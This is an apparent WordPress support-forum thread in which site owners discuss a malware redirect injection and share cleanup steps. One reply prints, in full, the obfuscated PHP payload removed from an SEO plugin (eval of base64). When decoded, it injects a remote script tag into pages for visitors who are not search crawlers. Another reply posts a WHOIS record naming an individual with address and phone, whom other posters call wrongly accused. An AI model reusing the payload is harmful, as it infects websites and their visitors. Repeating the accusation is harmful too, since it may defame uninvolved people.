Blog infected with malware

  • My blog is infected with malware on the site. I have changed my password and installed the WPMalwatch. It was run and found nothing.
    Some of the links my readers are seeing on the sign that pops up as a warning are:
    Threat Name: Exploit Phoenix Exploit Kit (Type 1112)
    File Name: decorum76.info/e9t/
    And:
    “The website at https://www.halfasstic.com contains elements from the site novelounge.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
    For detailed information about the problems with these elements, visit the Google safe browsing diagnostic page for novelounge.com.”

    1. Can anyone tell me what to do to get this off of my blog?
    2. If this is something that is over my head, who can I hire to do it for me?
    Thanks so much!

Viewing 10 replies - 16 through 25 (of 25 total)

  • Luckily MT fellers have reacted right in time I’d say, although couple of our visitors might have been kicked away from our loved WordPress blogs and sites.

    They’ve come up with a very easily solution.

    Here’s full details on this matter: https://wiki.mediatemple.net/w/WordPress_Redirect_Exploit

    Carry on WordPressing friends.

    None of my sites had the malicious code in the wp_posts table as MT warned. I did, however, have the Malware Detected! warning in Chrome. I’ve managed to clean my sites. Here are the steps I took:

    1. Upgrade to WP 3.0
    2. Delete the “JohnnyA” admin user (this was the only variation I saw, though there may be others.)
    3. Scan all of the theme files for malicious code. 95% of the time the code was found on a standard theme file (such as header.php), but I did find it on some custom template files as well. On one site I found the code buried inside of an old “Statcounter” script.
    4. Go to https://jsunpack.jeek.org/dec/go and scan the site for code inserted in plugins or the wp-includes folder. It was usually found in the Google Analyticator or Cryptx plugins (which I simply deleted and re-installed). In other instances, it was in the wp-includes jquery or thickbox files.
    5. Delete the wp-super-cache cache and back to normal.

    For good measure I changed admin and db passwords, but the sites I haven’t changed yet haven’t had a recurrence. While this has been a hassle, it’s gotten me off my butt to lock down the security on all my sites.

    I’ve had the same issue, and believe there is a back door somewhere in my client’s WordPress installation. I installed the WordPress File Monitor plugin after the initial hacking, and it alerted me today that more malicious files were added yesterday, despite removing all malicious code previously.

    I also discovered that two plugins were installed and activated that I did not put there: “Redirect” for redirecting via custom fields and “Search & Replace” for replacing strings in the database.

    I’m biting the bullet and doing a fresh WordPress installation, along with repeating all the password changes, etc. I’ve already done.

    You all seem to have lucked out. I have changed database passwords, WordPress login passwords, deleted the admin users that shouldn’t have been on there. All of the above and the frickin’ thing keeps coming back. I have 11 sites based on WordPress and five of them are infected. The thought of having to redo all the customisation etc. is killing me.

    Make sure to clean up properly. Don’t just patch.
    https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    Thanks Roy, I think it’s going to be best to start from scratch again. Wipe directories and databases and start afresh, I can copy the text and images down, last thing we need is anyone getting the Malware message – though the one saving grace is that the sites infected are for annual events and are very rarely read at other times of the year.

    I’ll leave it to you to judge what’s least work. Be aware of images though. Hacks often contain bogus jpg’s.

    Okay, a few of my websites and sites that I manage for others were hacked from the same ideacoreportal.com. All were on different servers, different accounts, different passwords, etc. One of them was a MediaTemple server.

    How exactly can we report or have that company stopped from what they are doing?

    The following company also owns these domains that were part of the redirect script: [“edisonsnightclub.com”,”gaindirectory.org”,”ideacoreportal.com”,”karenegren.com”]

    Registrant:
   IDEACore LLC
   22552 King Richard Ct.
   Beverly Hills, Michigan 48025
   United States

   Domain Name: IDEACOREPORTAL.COM
      Created on: 14-Jan-05
      Expires on: 14-Jan-11
      Last Updated on: 15-Jan-10

   Administrative Contact:
      Craig, Joseph
      IDEACore LLC
      22552 King Richard Ct.
      Beverly Hills, Michigan 48025
      United States
      2484333380      Fax -- 

   Technical Contact:
      Craig, Joseph
      IDEACore LLC
      22552 King Richard Ct.
      Beverly Hills, Michigan 48025
      United States
      2484333380      Fax -- 

   Domain servers in listed order:
      NS51.DOMAINCONTROL.COM
      NS52.DOMAINCONTROL.COM

    Sahaskatta, these assumptions are all wrong, it’s an acknowledged hack of servers that were not in the possession or control of the people or entities you list above. The owners of the domains are definitely not complicit, nor was it likely that the originating poster was.

    The Phoenix Exploit in kit has been implicated in issues in the realm of these posts.

    See https://community.websense.com/blogs/securitylabs/archive/2010/08/05/Media-Temple-injections-lead-to-Phoenix-Exploit-Kit.aspx

    and https://blogs.computerworld.com/16904/mass_injections_and_malware_continue_at_media_temple

    It’s not a good idea or fair to place in a blog post, the data above, when you’re not certain about the facts, as erroneous information defames the parties.

    As much as you want to “have that company stopped”, the ones you unwittingly think are behind this, they probably want to stop you or Skattertech from spreading false impressions.

    Someone attempted to maliciously point those domains to a hacked server, but the domains and contacts you list were surely not complicit. This could even be a registrar breach.

    The domains above don’t show any involvement with this attack and are clean.

    Sahaskatta and zackisaiah – to be fair and more important, to be accurate, you should remove these errant publications of opinions/assumptions about the domains and registrants.

    Just removed malicious code from my site https://www.onsiteiphonerepairs.co.uk found in SEO plugin:

    eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dFpYRmhjMmh2Y0hCbGNtbHVabTh1WTI5dEwycHpMbkJvY0NJK1BDOXpZM0pwY0hRKyIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gbXJvYmgoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qil7ICAgICBIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTsgICAgICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7ICAgICAgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSkpeyAgICAgIHJldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxcL2JvZHlbXlw+XSpcPikvc2knLGdtbCgpLiJcbiIuJyQxJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKTsgICAgIH1lbHNleyAgICAgIHJldHVybiAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpOyAgICAgfSAgICB9ICAgIG9iX3N0YXJ0KCdtcm9iaCcpOyAgIH0gIH0=”));?>
    <?php

    Hope this helps someone!

Viewing 10 replies - 16 through 25 (of 25 total)
  • The topic ‘Blog infected with malware’ is closed to new replies.